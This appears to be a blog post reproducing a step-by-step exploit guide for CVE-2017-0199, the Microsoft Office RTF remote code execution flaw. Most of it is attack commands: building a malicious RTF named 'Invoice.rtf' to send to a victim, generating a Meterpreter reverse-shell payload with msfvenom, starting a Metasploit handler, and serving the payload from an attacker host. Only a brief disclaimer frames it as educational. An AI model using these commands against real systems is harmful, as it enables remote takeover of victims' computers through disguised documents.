CVE-2017-0199: Microsoft Office Word RTF RCE vulnerability

What is CVE-2017-0199?

Microsoft Office 2007 SP3, Microsoft Office 2010 SP2, Microsoft Office 2013 SP1, Microsoft Office 2016, Microsoft Windows Vista SP2, Windows Server 2008 SP2, Windows 7 SP1, Windows 8.1 allow remote attackers to execute arbitrary code via a crafted document, aka “Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows API.”

Exploit

  1. Download cve-2017-0199_toolkit
  2. Generate malicious RTF file using following command and send it to victim
    Syntax:
    # python cve-2017-0199_toolkit.py -M gen -w <filename.rtf> -u <http://attacker.com/test.hta>
    Example:
    # python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc

  3. (Optional, if using MSF Payload) : Generate metasploit payload and start handler
    Example:
    Generate Payload:
    # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
    Start Handler:
    # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"

  4. Start toolkit in exploitation mode to deliver payloads
    Syntax:
    # python cve-2017-0199_toolkit.py -M exp -e <http://attacker.com/shell.exe> -l </tmp/shell.exe>
    Example:
    # python cve-2017-0199_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe

DEMO

Note

This program is for Educational purpose ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact that me (bhdresh) is not liable for any damages caused by direct or indirect use of the information or functionality provided by these programs.

Reference

https://github.com/bhdresh/CVE-2017-0199

No comments

Note: Only a member of this blog may post a comment.

Powered by Blogger.